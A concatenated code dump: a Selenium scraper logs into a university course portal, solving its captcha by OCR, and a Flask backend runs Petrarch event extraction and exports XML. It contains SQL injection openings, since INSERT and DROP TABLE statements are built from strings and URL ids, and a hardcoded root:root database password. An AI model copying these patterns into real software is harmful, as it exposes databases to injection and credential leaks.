c = driver.get_cookies()
cookies = {}
# get name and value item of cookie, convert to the dict used in requests
for cookie in c:
cookies[cookie['name']] = cookie['value']
# download the check code image via get request
response = requests.get(url=check_code_url, headers=headers, cookies=cookies)
img_data = response.content
with open(img_path, 'wb')as fp:
fp.write(img_data)
def ocr(img_path):
# recognize the image
ocr = ddddocr.DdddOcr()
with open(img_path, 'rb') as f:
img_bytes = f.read()
ocr_res = ocr.classification(img_bytes)
return ocr_res
# find checkcode element, if find then fill in
def fill_in_check_code(driver):
img_path = './img/code.png'
code_element = driver.find_elements_by_name('certCode')
if len(code_element) > 0:
get_check_code_image(driver, img_path)
code = ocr(img_path)
# fill in the code
code_element[0].send_keys(code)
def get_all_homework_from_course_website(driver):
courses_links = driver.find_element_by_class_name('otherSitesCategorList').find_elements_by_tag_name('li')
res = []
for i in range(len(courses_links)):
driver.find_element_by_link_text('我的课程').click()
sleep(1)
courses_links = driver.find_element_by_class_name('otherSitesCategorList').find_elements_by_tag_name('li')
courses_link = courses_links[i]
course_item = courses_link.find_element_by_class_name('fav-title')
course_name = course_item.find_element_by_class_name('fullTitle').text
        # navigate to the current course
        course_item.find_element_by_tag_name('a').click()
        sleep(1)
        # navigate to the homework page
driver.find_element_by_link_text('作业').click()
tables = driver.find_elements_by_tag_name('table')
if len(tables) == 0:
print("{}没有作业".format(course_name))
else:
homework_table = tables[0]
homeworks = homework_table.find_elements_by_tag_name('tr')[1:]
for homework in homeworks:
infos = homework.find_elements_by_tag_name('td')[1:]
infos = list(map(lambda x: x.text, infos))
infos.insert(0, course_name)
res.append(infos)
return res
def print_table(lines):
tb = PrettyTable(['课程名', '作业', '提交状态', '开始', '截止'], encoding=sys.stdout.encoding)
tb.add_rows(lines)
print(tb.get_string(sortby='截止', reversesort=False))
def course_list(username, password):
# load driver
chrome_driver_path = './driver/chromedriver.exe'
driver = get_driver(chrome_driver_path, headless=False)
# visit sep
url = "http://sep.ucas.ac.cn/"
driver.get(url)
sleep(1)
# fill in check code
fill_in_check_code(driver)
# fill in username and password
username_element = driver.find_element_by_id('userName')
username_element.send_keys(username)
password_element = driver.find_element_by_id('pwd')
password_element.send_keys(password)
# login to sep
driver.find_element_by_id('sb').click()
sleep(1)
    hands = driver.window_handles  # get all window handles
    driver.switch_to.window(hands[-1])  # switch to the new page
# move to course website
driver.find_element_by_link_text('课程网站').click()
sleep(1)
# get all homework info
homeworks = get_all_homework_from_course_website(driver)
driver.close()
# print results
homework_need_done = list(filter(lambda x: '尚未提交' in x[2], homeworks))
homework_done = list(filter(lambda x: '已提交' in x[2], homeworks))
print('赶紧做作业:')
print_table(homework_need_done)
print('还好做完了:')
print_table(homework_done)
if __name__ == '__main__':
m_username = ''
m_password = ''
course_list(m_username, m_password)
``` |
{
"source": "154544017/PetrarchChineseServer",
"score": 2
} |
#### File: resource/controller/eventLibApi.py
```python
from resource.model import dicModel
import datetime
import io
import json
from ConfigParser import ConfigParser
import threading
import time
from sqlalchemy.orm import sessionmaker
from sqlalchemy import create_engine
from flask import jsonify, request, Blueprint, g
from resource.model.textLibModel import TextLibrary
from petrarch_chinese.main import petrarch_chinese_main
from resource import db
from resource.model.analysisProjectModel import AnalysisProject
from resource.model.analysisProjectResultModel import AnalycisEventResult
from resource.model.textLibDataModel import TextLibraryData
from resource.model.dicModel import Dictionary
from sqlalchemy import text
from resource.model.analysisProjectResultModelSubThread import AnalycisEventResultSubThread
eventLibApi = Blueprint(name='event_lib', import_name=__name__)
engine = create_engine("mysql+pymysql://root:root@localhost:3306/lab?charset=utf8")
Session = sessionmaker(bind=engine)
threadLock = threading.Lock()
current_project_id = None
def create_analysis_result_table(project_id):
project_id = str(project_id)
table_name = 'rs_analysis_event_result_%s' % project_id
drop_sql = 'DROP TABLE IF EXISTS {}'.format(table_name)
create_sql = 'create table IF NOT EXISTS {}(' \
'id int(20) not null primary key auto_increment,' \
'text_id varchar(255) not null,' \
'recall_rate decimal(10,2),' \
'accuracy_rate decimal(10,2),' \
'event_num int(11) not null,' \
'event_result text not null' \
')'.format(table_name)
db.session.execute(drop_sql)
db.session.execute(create_sql)
@eventLibApi.route('/test')
def test():
# init_petrarch('1', '1')
# create_analysis_result_table('100')
petrarch_chinese_main()
return 'well done'
class AnalysisThread(threading.Thread):
def __init__(self, project_id, lib_id, dict_id, algorithm):
threading.Thread.__init__(self)
self.project_id = project_id
self.lib_id = lib_id
self.dict_id = dict_id
self.algorithm = algorithm
def run(self):
        # Acquire the lock; returns True once the lock is obtained.
        # Without the optional timeout argument this blocks until the lock is acquired,
        # otherwise it returns False after the timeout.
threadLock.acquire()
try:
self.analysis_event()
except Exception as e:
print e
session = Session()
project = session.query(AnalysisProject).get(self.project_id)
project.end_time = datetime.datetime.now()
            project.status = 4  # 4 means the analysis failed with an error
session.commit()
finally:
            # release the lock
            threadLock.release()
    # Prepare petrarch input: set the event-merge switch, the input text and the input dictionary
def init_petrarch(self):
# 调整合并事件开关
petr_cn_config = ConfigParser()
petr_cn_config.read('petrarch_chinese/configFile.ini')
if self.algorithm == 0:
petr_cn_config.set('Options', 'merge_event', 'False')
elif self.algorithm == 1:
petr_cn_config.set('Options', 'merge_event', 'True')
try:
with open('petrarch_chinese/configFile.ini', 'w+') as f:
petr_cn_config.write(f)
except Exception as e:
print (e)
        # fetch the input texts and write them where petrarch expects them
lib_tablename = 'rs_textlibrary_data_%s' % self.lib_id
TextLibraryData.__table__.name = lib_tablename
session = Session()
textdata = session.query(TextLibraryData).filter(TextLibraryData.is_delete == 0)
# textdata = TextLibraryData.query.filter(TextLibraryData.is_delete == 0)
with io.open('petrarch_chinese/input/test.txt', 'w', encoding='utf-8') as t:
for data in textdata:
text_id = data.id
text_title = data.title if data.title != '' else 'NULL'
text_summary = data.summary if data.summary != '' else 'NULL'
text_keywords = data.keywords if data.keywords != '' else 'NULL'
text_publish_time = data.publish_time if data.publish_time != '' else 'NULL'
text_author = data.author if data.author != '' else 'NULL'
text_source = 'NULL'
text_page = 'NULL'
text_content = data.content
text_url = data.url if data.url != '' else 'NULL'
input_list = [text_id, text_title, text_summary, text_keywords, text_publish_time, text_author,
text_source,
text_page, text_content, text_url]
input_list = [str(text) for text in input_list]
input_text = '|'.join(input_list).decode('utf-8')
t.write(input_text + '\n')
session = Session()
dictionary = session.query(Dictionary).get(self.dict_id)
dict_name = dictionary.file_name
petr_config = ConfigParser()
petr_config.read('petrarch_chinese/petrarch2/data/config/PETR_config.ini')
petr_config.set('Dictionaries', 'verbfile_name', dict_name)
petr_config.set('Dictionaries', 'test', 'True')
with open('petrarch_chinese/petrarch2/data/config/PETR_config.ini', 'w+') as fc:
petr_config.write(fc)
    # analyse the text-library documents in this worker thread and load the
    # extracted events into the result table of this project
    def analysis_event(self):
        # mark the project as started
        session = Session()
        project = session.query(AnalysisProject).get(self.project_id)
        project.status = 1  # 1 means running
        session.commit()
        self.init_petrarch()
        art_events = petrarch_chinese_main()
        # open the matching result table
        table_name = 'rs_analysis_event_result_%s' % self.project_id
        # save the events
try:
for art in art_events:
events = art_events[art]
event_num = len(events)
text_id = art
event_result = json.dumps(events)
new_result = AnalycisEventResult(text_id=text_id, event_num=event_num, event_result=event_result)
insertSQL = "insert into "+table_name+"(text_id,event_num,event_result) values('" + str(text_id) +"','" + str(event_num)+"','"+ event_result+"')"
# AnalycisEventResultSubThread.__table__.name = table_name
# temp = AnalycisEventResultSubThread(text_id=text_id,event_num=event_num,event_result=event_result)
insertSQL = insertSQL.replace(r'"',r'\"')
insertSQL = insertSQL.replace(r'\u', r'\\u')
session = Session()
session.execute(insertSQL)
session.commit()
            # update the project status
            session = Session()
            project = session.query(AnalysisProject).get(self.project_id)
            project.end_time = datetime.datetime.now()
            project.status = 2  # 2 means finished
            session.commit()
            # keep the user's analysis results in the designated folder
            print("ok")
        except Exception as e:
            session = Session()
            project = session.query(AnalysisProject).get(self.project_id)
            project.end_time = datetime.datetime.now()
            project.status = 4  # 4 means the analysis failed
            session.commit()
            print('error')
            print(e)
def test_thread():
time.sleep(5)
print("haha")
# start an event-extraction job on a text library
@eventLibApi.route('', methods=['POST'])
def create_analysis_event():
    paras = request.json
    lib_id = paras['lib_id']  # text library id
    algorithm = paras['algorithm']  # analysis algorithm
    type = paras['type']  # extraction/analysis type
    name = paras['name']  # name of the extraction job
    dict_id = paras['dic_id']  # dictionary id
    uid = g.uid  # user id
    # TODO the user is currently hard-coded for debugging
if type != 13:
return jsonify(code=20001, flag=False, message="算法类型错误")
analysis_project = AnalysisProject(name=name, textlibrary_id=lib_id, analysis_algorithm=algorithm,
analysis_type=type, dictionary_id=dict_id, create_user=uid,
create_time=datetime.datetime.now())
try:
db.session.add(analysis_project)
db.session.commit()
db.session.flush()
        # primary key of the newly inserted row
        id = analysis_project.id
        # create the matching result table for this project
        create_analysis_result_table(id)
        # run petrarch in a worker thread
analysis_thread = AnalysisThread(id, lib_id, dict_id, algorithm)
analysis_thread.start()
return jsonify(code=20000, flag=True, message="创建事件分析结果成功,分析程序将在后台运行")
except Exception as e:
print (e)
return jsonify(code=20001, flag=False, message="创建事件分析结果失败")
# get a page of analysis projects
@eventLibApi.route('/<page>/<size>', methods=['GET'])
def get_analysis_project(page, size):
try:
projects = AnalysisProject.query.filter(AnalysisProject.is_delete == 1).all()
start = (int(page) - 1) * int(size)
end = min(int(page) * int(size), len(projects))
result_project = []
for project in projects[start:end]:
result_project.append(project.as_dict())
return jsonify(code=20000, flag=True, message="查询成功", data={"total": len(projects), "rows": result_project})
except Exception as e:
print(e)
return jsonify(code=20001, flag=False, message="查询事件分析结果失败")
# delete a specific analysis project
@eventLibApi.route('/<id>', methods=['DELETE'])
def delete_analysis_project(id):
project = AnalysisProject.query.get(id)
if project is None:
return jsonify(code=20001, flag=False, message="不存在指定的文本库分析信息")
db.session.delete(project)
table_name = 'rs_analysis_event_result_%s' % id
drop_sql = 'DROP TABLE IF EXISTS {}'.format(table_name)
db.session.execute(drop_sql)
db.session.commit()
return jsonify(code=20000, flag=True, message="删除成功")
# get the analysis status of a project
@eventLibApi.route('/<id>', methods=['GET'])
def get_analysis_status(id):
project = AnalysisProject.query.get(id)
if project is None:
return jsonify(code=20001, flag=False, message="不存在指定的文本库分析信息")
status = project.status
return jsonify(code=20000, flag=True, message="未完成", data={"status": status})
@eventLibApi.route('/detail/<id>', methods=['GET'])
def get_analysis_detail(id):
project = AnalysisProject.query.get(id)
if project is None:
return jsonify(code=20001, flag=False, message="不存在指定的文本库分析信息")
textlib_id = project.textlibrary_id
TextLibraryData.__table__.name = 'rs_textlibrary_data_%s' % textlib_id
result_tablename = 'rs_analysis_event_result_%s' % id
AnalycisEventResult.__table__.name = result_tablename
analysis_results = db.session.query(AnalycisEventResult).all()
results = []
for analysis_result in analysis_results:
text_id = analysis_result.text_id
text_data = TextLibraryData.query.get(text_id)
result = analysis_result.as_dict()
result['content'] = text_data.content.encode("utf-8")
result['title'] = text_data.title
result['text_id'] = text_id
unicode_dict_list = json.loads(result['event_result'], encoding='utf-8',strict=False)
for unicode_dict in unicode_dict_list:
for key in unicode_dict:
if key != "origin":
unicode_dict[key] = unicode_dict[key].encode("utf-8")
result['event_result'] = unicode_dict_list
results.append(result)
return jsonify(code=20000, flag=True, message="查询成功", data=results)
@eventLibApi.route('/init', methods=['GET'])
def get_libs_and_dicts():
try:
libs = TextLibrary.query.filter(TextLibrary.is_delete != 1).all()
libs_json = []
for lib in libs:
libs_json.append(lib.as_dict())
res = dicModel.Dictionary.query.all()
data_json = []
for data in res:
data_json.append(data.as_dict())
return jsonify(code=20000, flag=True, message="查询完成", data={"libs": libs_json, "dicts": data_json})
except:
return jsonify(code=20001, flag=False, message="查询失败")
@eventLibApi.route('/', methods=['GET'])
def get_events():
try:
events = AnalysisProject.query.filter(AnalysisProject.is_delete != 1).all()
events_json = []
for event in events:
events_json.append(event.as_dict())
return jsonify(code=20000, flag=True, message="查询完成", data={"total": len(events), "json": events_json})
except:
return jsonify(code=20001, flag=False, message="查询失败")
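# Usage sketch (illustrative values only): create_analysis_event above expects a JSON body
# shaped like the dict below; the field names come from the handler, the values are hypothetical.
#
#   POST <prefix>/   (blueprint "event_lib")
#   {
#       "lib_id": 1,        # text library id -> rs_textlibrary_data_1
#       "algorithm": 1,     # 1 -> merge_event = True, 0 -> merge_event = False
#       "type": 13,         # the only accepted extraction type
#       "name": "demo run",
#       "dic_id": 1         # dictionary id
#   }
#
# A successful call creates rs_analysis_event_result_<project id> and starts an AnalysisThread
# that runs petrarch_chinese_main() in the background.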
```
#### File: resource/controller/eventResultApi.py
```python
from flask import Flask, blueprints, jsonify, request, Blueprint, g, send_file, make_response, send_from_directory
from resource.model.analysisProjectResultModel import AnalycisEventResult
from resource.model.analysisProjectModel import AnalysisProject
from resource.model.textLibDataModel import TextLibraryData
import json
import xml.dom.minidom
import re
import codecs
eventResultApi = Blueprint(name='event_result', import_name=__name__)
@eventResultApi.route('xml/<articleid>', methods=['GET'])
def get(articleid):
response = make_response(
send_from_directory("C:\\Users\\wxn\\Desktop\\1", 'e_result_1' + '.xml', as_attachment=True))
return response
@eventResultApi.route('/ff/<articleid>/<num>', methods=['GET'])
def event2xml(articleid, num):
word = []
fileName = articleid + "-format.txt"
# fileName = "C:/Users/wxn/Desktop/1/1-format.txt"
    def convertUTF8ToANSI(oldfile, newfile):
        # open the UTF-8 text file
        f = codecs.open(oldfile, 'r', 'utf8')
        utfstr = f.read()
        f.close()
        # re-encode the UTF-8 string as ANSI (Windows 'mbcs' codec)
        outansestr = utfstr.encode('mbcs')
        # save the converted text in binary mode
        f = open(newfile, 'wb')
        f.write(outansestr)
        f.close()
oldfile = fileName
newfile = fileName
convertUTF8ToANSI(oldfile, newfile)
with open(fileName, "r") as file:
char = file.read(0)
for char in file:
word.append(char)
file.close()
full = str(word[0])
allContent = full.split()
index = allContent[0]
date_all = re.findall(r"(\d{4}-\d{1,2}-\d{1,2})", full)
time_all = re.findall(r"(\d{2}:\d{2}:\d{2})", full)
index = allContent[0]
date = date_all[0]
retime = time_all[0]
num = 0
for item in allContent:
num = num + 1
if item == retime:
break
full = ''
for j in range(num + 3, len(allContent) - 1):
full = full + allContent[j]
    def loadDataSet(fileName, splitChar='\t'):
        dataSet = []
        with open(fileName) as fr:
            for line in fr.readlines()[2:]:
                # strip() drops surrounding whitespace; split() cuts the line on splitChar
                curline = line.strip().split(splitChar)
                # keep every field as a string (despite the original comment about floats)
                fltline = list(map(str, curline))
                dataSet.append(fltline)
return dataSet
dataSet = loadDataSet(fileName)
count = 0
coreData = []
def detect(text):
blankLocation = 0
coreTemp = text
for qq in coreTemp:
if qq == ".":
blankLocation = coreTemp.index(qq)
break
elif qq == " ":
blankLocation = coreTemp.index(qq)
break
if blankLocation == 0:
blankLocation = len(coreTemp)
return text[0:blankLocation]
for data in dataSet:
if ("#e" in str(data)):
co = count
event = data[0]
ids = dataSet[co + 2][1]
content = dataSet[co + 3][1]
source = dataSet[co + 4][1]
target = dataSet[co + 5][1]
trigger = dataSet[co + 6][1]
anchor = dataSet[co + 7][1]
coreData.append(event)
coreData.append(ids)
coreData.append(detect(content))
coreData.append(detect(source))
coreData.append(target)
coreData.append(detect(trigger))
coreData.append(detect(anchor))
count = count + 1
    # create an empty XML document in memory
    doc = xml.dom.minidom.Document()
    # create the root element
    root = doc.createElement('Body')  # the root represents the article body
    # attach the root element to the document object
    doc.appendChild(root)
nodeAge = doc.createElement("content-ID")
nodeAge.appendChild(doc.createTextNode("Content ID-" + index))
root.appendChild(nodeAge)
nodeAge = doc.createElement("fullcontent")
nodeAge.appendChild(doc.createTextNode(full))
root.appendChild(nodeAge)
nodeAge = doc.createElement("reporttime")
nodeAge.appendChild(doc.createTextNode(date + " " + retime))
root.appendChild(nodeAge)
    # remember the previous paragraph number: when the current one differs, a new Paragraph node is created
    # remember the previous sentence number: when the current one differs, a new Sentence node is created
    childParagraphBefore = ""
    childSentenceBefore = ""
    childParagraphNow = ""
    childSentenceNow = ""
for i in range(len(coreData)):
if ("#e" in str(coreData[i])):
ids = coreData[i + 1]
x = ids.split('_')
paraNum = x[0]
sentenceNum = x[1]
# x = ids.split('-')
# y = x[1].split('_')
# aticleNum = x[0]
# paraNum = y[0]
# sentenceNum = y[1]
# sp = '_'
# nPos=ids.index(sp)
childParagraphNow = paraNum
childSentenceNow = sentenceNum
            if childParagraphBefore != childParagraphNow:  # compare values, not identity
nodeParagraph = doc.createElement('Paragraph') # 创建段落
nodeSentence = doc.createElement('Sentence') # 创建句子
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeParagraph.appendChild(nodeSentence) # 把句子连在段落上
nodeEvent = doc.createElement('Event')
nodeEvent.setAttribute('eid', coreData[i])
nodeSentence.appendChild(nodeEvent)
# 位置计算
content_target = coreData[i + 2]
content_length = len(content_target)
content_full = full
full_length = len(full)
location = 0
for j in range(full_length):
if (content_full[j] == content_target[0]):
point_j = j
flag = 0
point_i = 0
for k in range(content_length):
if (content_full[point_j] != content_target[point_i]):
break
elif (content_full[point_j] == content_target[point_i]):
point_j = point_j + 1
point_i = point_i + 1
flag = flag + 1
if (flag == content_length):
location = j
content_target = coreData[i + 2]
content_length = len(content_target)
location1 = 0
location2 = 0
location3 = 0
# source
source_target = coreData[i + 3]
source_target_length = len(source_target)
for j1 in range(content_length):
if (content_target[j1] == source_target[0]):
point_j1 = j1
flag1 = 0
point_i1 = 0
for k1 in range(source_target_length):
if (content_target[point_j1] != source_target[point_i1]):
break
elif (content_target[point_j1] == source_target[point_i1]):
point_j1 = point_j1 + 1
point_i1 = point_i1 + 1
flag1 = flag1 + 1
if (flag1 == source_target_length):
location1 = j1
# trigger
trigger_target = coreData[i + 5]
# print("191:"+coreData[i + 5])
trigger_target_length = len(trigger_target)
for j2 in range(content_length):
if (content_target[j2] == trigger_target[0]):
point_j2 = j2
flag2 = 0
point_i2 = 0
for k2 in range(trigger_target_length):
if (content_target[point_j2] != trigger_target[point_i2]):
break
elif (content_target[point_j2] == trigger_target[point_i2]):
point_j2 = point_j2 + 1
point_i2 = point_i2 + 1
flag2 = flag2 + 1
if (flag2 == trigger_target_length):
location2 = j2
# target
target_target = coreData[i + 4]
target_target_length = len(target_target)
for j3 in range(content_length):
if (content_target[j3] == target_target[0]):
point_j3 = j3
flag3 = 0
point_i3 = 0
for k3 in range(target_target_length):
if (content_target[point_j3] != target_target[point_i3]):
break
elif (content_target[point_j3] == target_target[point_i3]):
point_j3 = point_j3 + 1
point_i3 = point_i3 + 1
flag3 = flag3 + 1
if (flag3 == target_target_length):
location3 = j3
# 位置计算(end)
if (coreData[i + 3] in content):
left1 = 0
right1 = content.index(coreData[i + 3])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left1:right1])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
# 检验
nodeSource = doc.createElement('source')
nodeSource.setAttribute('begin', str(location + location1))
nodeSource.setAttribute('end', str(location + location1 + source_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeSource.appendChild(doc.createTextNode(coreData[i + 3]))
nodeEvent.appendChild(nodeSource)
if (coreData[i + 5] in content):
print(coreData[i + 3])
left2 = content.index(coreData[i + 3]) + len(coreData[i + 3])
right2 = content.index(coreData[i + 5])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left2:right2])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTrigger = doc.createElement('trigger')
nodeTrigger.setAttribute('triggerid', coreData[i + 6][0:3])
nodeTrigger.setAttribute('begin', str(location + location2))
nodeTrigger.setAttribute('end', str(location + location2 + trigger_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTrigger.appendChild(doc.createTextNode(coreData[i + 5]))
nodeEvent.appendChild(nodeTrigger)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 5]) + len(coreData[i + 5])
right3 = content.index(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:right3])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTarget = doc.createElement('target')
nodeTarget.setAttribute('begin', str(location + location3))
nodeTarget.setAttribute('end', str(location + location3 + target_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTarget.appendChild(doc.createTextNode(coreData[i + 4]))
nodeEvent.appendChild(nodeTarget)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 4]) + len(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
# 将各叶子节点添加到父节点Manager中,
# 最后将Manager添加到根节点Managers中
root.appendChild(nodeParagraph)
            elif childParagraphBefore == childParagraphNow:  # compare values, not identity
                if childSentenceBefore != childSentenceNow:
nodeSentence = doc.createElement('Sentence') # 创建句子
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeParagraph.appendChild(nodeSentence) # 把句子0连在段落上
nodeEvent = doc.createElement('Event')
nodeEvent.setAttribute('eid', coreData[i])
nodeSentence.appendChild(nodeEvent)
# 位置计算
content_target = coreData[i + 2]
content_length = len(content_target)
content_full = full
full_length = len(full)
location = 0
for j in range(full_length):
if (content_full[j] == content_target[0]):
point_j = j
flag = 0
point_i = 0
for k in range(content_length):
if (content_full[point_j] != content_target[point_i]):
break
elif (content_full[point_j] == content_target[point_i]):
point_j = point_j + 1
point_i = point_i + 1
flag = flag + 1
if (flag == content_length):
location = j
content_target = coreData[i + 2]
content_length = len(content_target)
location1 = 0
location2 = 0
location3 = 0
# source
source_target = coreData[i + 3]
source_target_length = len(source_target)
for j1 in range(content_length):
if (content_target[j1] == source_target[0]):
point_j1 = j1
flag1 = 0
point_i1 = 0
for k1 in range(source_target_length):
if (content_target[point_j1] != source_target[point_i1]):
break
elif (content_target[point_j1] == source_target[point_i1]):
point_j1 = point_j1 + 1
point_i1 = point_i1 + 1
flag1 = flag1 + 1
if (flag1 == source_target_length):
location1 = j1
# trigger
trigger_target = coreData[i + 5]
trigger_target_length = len(trigger_target)
for j2 in range(content_length):
if (content_target[j2] == trigger_target[0]):
point_j2 = j2
flag2 = 0
point_i2 = 0
for k2 in range(trigger_target_length):
if (content_target[point_j2] != trigger_target[point_i2]):
break
elif (content_target[point_j2] == trigger_target[point_i2]):
point_j2 = point_j2 + 1
point_i2 = point_i2 + 1
flag2 = flag2 + 1
if (flag2 == trigger_target_length):
location2 = j2
# target
target_target = coreData[i + 4]
target_target_length = len(target_target)
for j3 in range(content_length):
if (content_target[j3] == target_target[0]):
point_j3 = j3
flag3 = 0
point_i3 = 0
for k3 in range(target_target_length):
if (content_target[point_j3] != target_target[point_i3]):
break
elif (content_target[point_j3] == target_target[point_i3]):
point_j3 = point_j3 + 1
point_i3 = point_i3 + 1
flag3 = flag3 + 1
if (flag3 == target_target_length):
location3 = j3
if (coreData[i + 3] in content):
left1 = 0
right1 = content.index(coreData[i + 3])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left1:right1])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeSource = doc.createElement('source')
nodeSource.setAttribute('begin', str(location + location1))
nodeSource.setAttribute('end', str(location + location1 + source_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeSource.appendChild(doc.createTextNode(coreData[i + 3]))
nodeEvent.appendChild(nodeSource)
if (coreData[i + 5] in content):
left2 = content.index(coreData[i + 3]) + len(coreData[i + 3])
right2 = content.index(coreData[i + 5])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left2:right2])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTrigger = doc.createElement('trigger')
nodeTrigger.setAttribute('triggerid', coreData[i + 6][0:3])
nodeTrigger.setAttribute('begin', str(location + location2))
nodeTrigger.setAttribute('end', str(location + location2 + trigger_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTrigger.appendChild(doc.createTextNode(coreData[i + 5]))
nodeEvent.appendChild(nodeTrigger)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 5]) + len(coreData[i + 5])
right3 = content.index(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:right3])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTarget = doc.createElement('target')
nodeTarget.setAttribute('begin', str(location + location3))
nodeTarget.setAttribute('end', str(location + location3 + target_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTarget.appendChild(doc.createTextNode(coreData[i + 4]))
nodeEvent.appendChild(nodeTarget)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 4]) + len(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
                elif childSentenceBefore == childSentenceNow:  # compare values, not identity
nodeEvent = doc.createElement('Event')
nodeEvent.setAttribute('eid', coreData[i])
nodeSentence.appendChild(nodeEvent)
# 位置计算
content_target = coreData[i + 2]
content_length = len(content_target)
content_full = full
full_length = len(full)
location = 0
for j in range(full_length):
if (content_full[j] == content_target[0]):
point_j = j
flag = 0
point_i = 0
for k in range(content_length):
if (content_full[point_j] != content_target[point_i]):
break
elif (content_full[point_j] == content_target[point_i]):
point_j = point_j + 1
point_i = point_i + 1
flag = flag + 1
if (flag == content_length):
location = j
content_target = coreData[i + 2]
content_length = len(content_target)
location1 = 0
location2 = 0
location3 = 0
# source
source_target = coreData[i + 3]
source_target_length = len(source_target)
for j1 in range(content_length):
if (content_target[j1] == source_target[0]):
point_j1 = j1
flag1 = 0
point_i1 = 0
for k1 in range(source_target_length):
if (content_target[point_j1] != source_target[point_i1]):
break
elif (content_target[point_j1] == source_target[point_i1]):
point_j1 = point_j1 + 1
point_i1 = point_i1 + 1
flag1 = flag1 + 1
if (flag1 == source_target_length):
location1 = j1
trigger_target = coreData[i + 5]
trigger_target_length = len(trigger_target)
for j2 in range(content_length):
if (content_target[j2] == trigger_target[0]):
point_j2 = j2
flag2 = 0
point_i2 = 0
for k2 in range(trigger_target_length):
if (content_target[point_j2] != trigger_target[point_i2]):
break
elif (content_target[point_j2] == trigger_target[point_i2]):
point_j2 = point_j2 + 1
point_i2 = point_i2 + 1
flag2 = flag2 + 1
if (flag2 == trigger_target_length):
location2 = j2
# target
target_target = coreData[i + 4]
target_target_length = len(target_target)
for j3 in range(content_length):
if (content_target[j3] == target_target[0]):
point_j3 = j3
flag3 = 0
point_i3 = 0
for k3 in range(target_target_length):
if (content_target[point_j3] != target_target[point_i3]):
break
elif (content_target[point_j3] == target_target[point_i3]):
point_j3 = point_j3 + 1
point_i3 = point_i3 + 1
flag3 = flag3 + 1
if (flag3 == target_target_length):
location3 = j3
if (coreData[i + 3] in content):
left1 = 0
right1 = content.index(coreData[i + 3])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left1:right1])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeSource = doc.createElement('source')
nodeSource.setAttribute('begin', str(location + location1))
nodeSource.setAttribute('end', str(location + location1 + source_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeSource.appendChild(doc.createTextNode(coreData[i + 3]))
nodeEvent.appendChild(nodeSource)
if (coreData[i + 5] in content):
left2 = content.index(coreData[i + 3]) + len(coreData[i + 3])
right2 = content.index(coreData[i + 5])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left2:right2])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTrigger = doc.createElement('trigger')
nodeTrigger.setAttribute('triggerid', coreData[i + 6][0:3])
nodeTrigger.setAttribute('begin', str(location + location2))
nodeTrigger.setAttribute('end', str(location + location2 + trigger_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTrigger.appendChild(doc.createTextNode(coreData[i + 5]))
nodeEvent.appendChild(nodeTrigger)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 5]) + len(coreData[i + 5])
right3 = content.index(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:right3])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
nodeTarget = doc.createElement('target')
nodeTarget.setAttribute('begin', str(location + location3))
nodeTarget.setAttribute('end', str(location + location3 + target_target_length - 1))
# 给叶子节点name设置一个文本节点,用于显示文本内容
nodeTarget.appendChild(doc.createTextNode(coreData[i + 4]))
nodeEvent.appendChild(nodeTarget)
if (coreData[i + 4] in content):
left3 = content.index(coreData[i + 4]) + len(coreData[i + 4])
nodeInvalid = doc.createElement('invalid')
nodeInvalid.appendChild(doc.createTextNode(content[left3:])) # 存放具体的冗余内容
nodeEvent.appendChild(nodeInvalid)
childParagraphBefore = childParagraphNow
childSentenceBefore = childSentenceNow
    # write the XML document to disk
# i = 1
fp = open('C:\\Users\\wxn\\Desktop\\1\\e_result_' + index + '.xml', 'w')
doc.writexml(fp, indent='\t', addindent='\t', newl='\n', encoding="gbk")
# response = make_response(
# send_from_directory("C:\\Users\\wxn\\Desktop\\1", 'e_result_' + index + '.xml', as_attachment=True))
return "dahsi"
@eventResultApi.route('/<id>', methods=['GET'])
def get_event_result(id):
try:
table_name = 'rs_analysis_project_' + id
AnalycisEventResult.__table__.name = table_name
results = AnalycisEventResult.query.filter(AnalycisEventResult.text_id == id).all()
